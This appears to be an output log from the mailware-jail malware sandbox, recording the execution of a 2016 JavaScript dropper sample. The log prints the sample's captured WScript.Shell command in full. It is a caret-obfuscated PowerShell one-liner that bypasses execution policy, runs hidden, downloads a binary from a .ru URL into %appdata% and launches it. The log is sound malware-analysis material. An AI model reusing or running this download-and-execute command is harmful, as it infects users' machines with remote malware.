a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out
1 Oct 13:05:34 - mailware-jail, a malware sandbox ver. 0.6
1 Oct 13:05:34 - ------------------------
1 Oct 13:05:34 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js
1 Oct 13:05:34 - Malware files: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
1 Oct 13:05:34 - Output file for sandbox dump: sandbox_dump_after.json
1 Oct 13:05:34 - Output directory for generated files: output/
1 Oct 13:05:34 - ==> Preparing Sandbox environment.
1 Oct 13:05:34 - => Executing: env/utils.js
1 Oct 13:05:34 - => Executing: env/eval.js
1 Oct 13:05:34 - Preparing sandbox to intercept eval() calls.
1 Oct 13:05:34 - => Executing: env/function.js
1 Oct 13:05:34 - Preparing sandbox to intercept 'new Function()' calls.
1 Oct 13:05:34 - => Executing: env/wscript.js
1 Oct 13:05:34 - Preparing sandbox to emulate WScript environment.
1 Oct 13:05:34 - => Executing: env/other.js
1 Oct 13:05:34 - => Executing: env/console.js
1 Oct 13:05:34 - ==> Executing malware file(s).
1 Oct 13:05:34 - => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll)
1 Oct 13:05:34 - Created: WScript.Shell[1]
1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined)
1 Oct 13:05:34 - ==> Cleaning up sandbox.
1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file.
1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json